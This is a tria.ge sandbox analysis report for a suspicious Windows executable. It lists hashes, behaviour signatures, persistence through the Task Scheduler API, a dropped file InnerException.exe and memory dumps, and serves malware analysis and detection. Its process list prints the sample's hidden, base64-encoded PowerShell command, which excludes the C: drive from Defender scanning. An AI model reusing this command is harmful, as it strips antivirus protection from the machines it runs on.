Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

7

Static

static

3

b3d19d6568...01.exe

windows7-x64

7

b3d19d6568...01.exe

windows10-2004-x64

7

Analysis

  • max time kernel
    150s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10/07/2023, 16:52

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    b3d19d65687560f5c206d0338b7d6601.exe

  • Size

    1.8MB

  • MD5

    b3d19d65687560f5c206d0338b7d6601

  • SHA1

    7dc6e5681c33800c6543ecb148d4718e33138ee9

  • SHA256

    05c4f71a5caa0ed6809fdfa57b44836f5ee6408d73f6b97cd9a751b696091101

  • SHA512

    a08abdf2d73de01eabb72d9af096c3f6159861d376f4790837fb6e95ef50d81455279ce4e04cc39ff6d75a20d769c12123f958971e492fb3197d85120b36e6ee

  • SSDEEP

    24576:osFKs/vvt1MSC/GoWvyMcUH81mVjIZ/WimspSM8rta7yLp08TM8nch2Cy7v4P+7M:osFKGbNoy9x0VpFm1ZE7yFsC9CiFb6h

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\b3d19d65687560f5c206d0338b7d6601.exe
    "C:\Users\Admin\AppData\Local\Temp\b3d19d65687560f5c206d0338b7d6601.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2904
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA==
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:4328
  • C:\Users\Admin\AppData\Roaming\Item1\InnerException.exe
    C:\Users\Admin\AppData\Roaming\Item1\InnerException.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:5076

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wmirirg2.mov.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Item1\InnerException.exe
    Filesize

    1.8MB

    MD5

    b3d19d65687560f5c206d0338b7d6601

    SHA1

    7dc6e5681c33800c6543ecb148d4718e33138ee9

    SHA256

    05c4f71a5caa0ed6809fdfa57b44836f5ee6408d73f6b97cd9a751b696091101

    SHA512

    a08abdf2d73de01eabb72d9af096c3f6159861d376f4790837fb6e95ef50d81455279ce4e04cc39ff6d75a20d769c12123f958971e492fb3197d85120b36e6ee

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Item1\InnerException.exe
    Filesize

    1.8MB

    MD5

    b3d19d65687560f5c206d0338b7d6601

    SHA1

    7dc6e5681c33800c6543ecb148d4718e33138ee9

    SHA256

    05c4f71a5caa0ed6809fdfa57b44836f5ee6408d73f6b97cd9a751b696091101

    SHA512

    a08abdf2d73de01eabb72d9af096c3f6159861d376f4790837fb6e95ef50d81455279ce4e04cc39ff6d75a20d769c12123f958971e492fb3197d85120b36e6ee

    Download Submit

  • memory/2904-189-0x00000195472F0000-0x0000019547470000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2904-2922-0x00000195472E0000-0x00000195472F0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2904-139-0x00000195472F0000-0x0000019547470000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2904-141-0x00000195472F0000-0x0000019547470000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2904-195-0x00000195472F0000-0x0000019547470000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2904-145-0x00000195472F0000-0x0000019547470000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2904-147-0x00000195472F0000-0x0000019547470000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2904-149-0x00000195472F0000-0x0000019547470000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2904-151-0x00000195472F0000-0x0000019547470000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2904-153-0x00000195472F0000-0x0000019547470000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2904-155-0x00000195472F0000-0x0000019547470000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2904-157-0x00000195472F0000-0x0000019547470000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2904-159-0x00000195472F0000-0x0000019547470000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2904-161-0x00000195472F0000-0x0000019547470000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2904-163-0x00000195472F0000-0x0000019547470000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2904-165-0x00000195472F0000-0x0000019547470000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2904-167-0x00000195472F0000-0x0000019547470000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2904-169-0x00000195472F0000-0x0000019547470000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2904-171-0x00000195472F0000-0x0000019547470000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2904-173-0x00000195472F0000-0x0000019547470000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2904-175-0x00000195472F0000-0x0000019547470000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2904-177-0x00000195472F0000-0x0000019547470000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2904-179-0x00000195472F0000-0x0000019547470000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2904-181-0x00000195472F0000-0x0000019547470000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2904-183-0x00000195472F0000-0x0000019547470000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2904-185-0x00000195472F0000-0x0000019547470000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2904-187-0x00000195472F0000-0x0000019547470000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2904-133-0x000001952CB10000-0x000001952CCE2000-memory.dmp

    Filesize

    1.8MB

    Download

  • memory/2904-137-0x00000195472F0000-0x0000019547470000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2904-191-0x00000195472F0000-0x0000019547470000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2904-143-0x00000195472F0000-0x0000019547470000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2904-197-0x00000195472F0000-0x0000019547470000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2904-199-0x00000195472F0000-0x0000019547470000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2904-761-0x00000195472E0000-0x00000195472F0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2904-1459-0x000001952E9B0000-0x000001952E9B1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2904-1497-0x0000019547560000-0x0000019547621000-memory.dmp

    Filesize

    772KB

    Download

  • memory/2904-1499-0x00000195472E0000-0x00000195472F0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2904-1501-0x00000195472E0000-0x00000195472F0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2904-2921-0x00000195472E0000-0x00000195472F0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2904-193-0x00000195472F0000-0x0000019547470000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2904-2924-0x00000195472E0000-0x00000195472F0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2904-2927-0x00000195472E0000-0x00000195472F0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2904-4403-0x00000195472E0000-0x00000195472F0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2904-136-0x00000195472F0000-0x0000019547470000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/2904-134-0x00000195472E0000-0x00000195472F0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2904-135-0x000001952EB10000-0x000001952EB32000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4328-4417-0x0000023CFDCD0000-0x0000023CFDCE0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4328-4418-0x0000023CFDCD0000-0x0000023CFDCE0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4328-4416-0x0000023CFDCD0000-0x0000023CFDCE0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4328-4415-0x0000023CFDCD0000-0x0000023CFDCE0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/5076-5778-0x0000021C3D7D0000-0x0000021C3D7E0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/5076-4423-0x0000021C3D7D0000-0x0000021C3D7E0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/5076-5774-0x0000021C3D7D0000-0x0000021C3D7E0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/5076-5467-0x0000021C3D7D0000-0x0000021C3D7E0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/5076-5776-0x0000021C3D7D0000-0x0000021C3D7E0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/5076-5747-0x0000021C23490000-0x0000021C23491000-memory.dmp

    Filesize

    4KB

    Download

  • memory/5076-5781-0x0000021C3D7D0000-0x0000021C3D7E0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/5076-7263-0x0000021C3D7D0000-0x0000021C3D7E0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/5076-7265-0x0000021C3D7D0000-0x0000021C3D7E0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/5076-7267-0x0000021C3D7D0000-0x0000021C3D7E0000-memory.dmp

    Filesize

    64KB

    Download